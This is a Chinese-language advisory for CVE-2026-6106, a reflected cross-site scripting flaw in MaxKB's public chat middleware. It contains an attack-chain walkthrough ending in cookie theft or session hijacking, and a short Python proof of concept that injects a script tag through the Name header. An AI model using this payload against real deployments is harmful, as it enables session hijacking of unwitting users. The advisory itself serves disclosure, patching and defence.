CVE-2026-6106: MaxKB跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-6106

漏洞类型

Cross-site Scripting (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

MaxKB

漏洞概述

1Panel-dev MaxKB 2.2.1及之前版本存在跨站脚本漏洞。该漏洞位于公共聊天接口的StaticHeadersMiddleware中间件，因未对Name参数进行有效过滤导致。攻击者可远程构造恶意Payload，诱导用户点击触发，从而在浏览器端执行脚本。利用难度低且已有公开Exp，建议升级至2.8.0版本修复。

技术细节

该漏洞的根源在于MaxKB公共聊天接口组件中的StaticHeadersMiddleware函数未能正确处理外部输入。在文件apps/common/middleware/static_headers_middleware.py中，程序直接提取了请求中的Name参数值，并将其未经消毒地应用于HTTP响应头或页面渲染逻辑中。攻击者可以发送特制的HTTP请求，其中包含恶意JavaScript代码作为Name字段的值。当服务器处理该请求并生成响应时，恶意代码会被反射回客户端。由于浏览器无法区分响应中的合法脚本与注入脚本，一旦受害者加载了受影响的页面，脚本便会自动执行。这种反射型XSS攻击允许攻击者劫持会话、修改页面内容或重定向用户，虽然CVSS评级为低危，但在特定的钓鱼攻击场景下仍具风险。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在使用MaxKB系统，且版本在2.2.1及以下。

STEP 2

2. 构造恶意请求

攻击者构造包含恶意JavaScript代码的HTTP请求，将Payload植入Name参数或Header中。

STEP 3

3. 发送攻击链接

攻击者将构造好的恶意链接发送给目标用户（受害者），诱导其点击。

STEP 4

4. 触发漏洞

受害者点击链接后，浏览器向服务器发送请求，服务器将恶意脚本反射回响应页面。

STEP 5

5. 执行恶意代码

受害者的浏览器解析响应并执行注入的恶意脚本，可能导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-6106
# This script demonstrates the XSS vulnerability via the 'Name' parameter.

import requests

target_url = "http://target-ip:port/api/chat/public" # Replace with actual target endpoint
payload = "<script>alert('CVE-2026-6106_XSS')</script>"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Name": payload, # Injecting payload into the Name parameter
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
}

try:
    response = requests.get(target_url, headers=headers)
    
    # Check if the payload is reflected in the response headers or body
    if payload in response.text or payload in str(response.headers):
        print("[+] Vulnerability Confirmed! Payload reflected in response.")
        print("[+] Response Headers:", response.headers)
    else:
        print("[-] Vulnerability could not be confirmed directly.")
        print("[+] Hint: Check the browser behavior if manual testing.")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

MaxKB <= 2.2.1

防御指南

临时缓解措施

若无法立即升级，建议在Web应用防火墙（WAF）或反向代理处部署规则，拦截并清理HTTP请求头中包含脚本标签（如<script>）的流量，特别是针对Name参数的输入进行严格校验。同时，加强对用户的安全教育，不轻易点击不明链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6106
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6106
3 Details https://www.cvedetails.com/cve/CVE-2026-6106/
4 VulDB https://vuldb.com/cve/CVE-2026-6106
5 Link https://github.com/1Panel-dev/MaxKB/
6 Link https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da
7 Link https://github.com/1Panel-dev/MaxKB/pull/4919
8 Link https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0
9 Link https://github.com/AnalogyC0de/public_exp/issues/23
10 Link https://vuldb.com/submit/781810
11 Link https://vuldb.com/vuln/356965
12 Link https://vuldb.com/vuln/356965/cti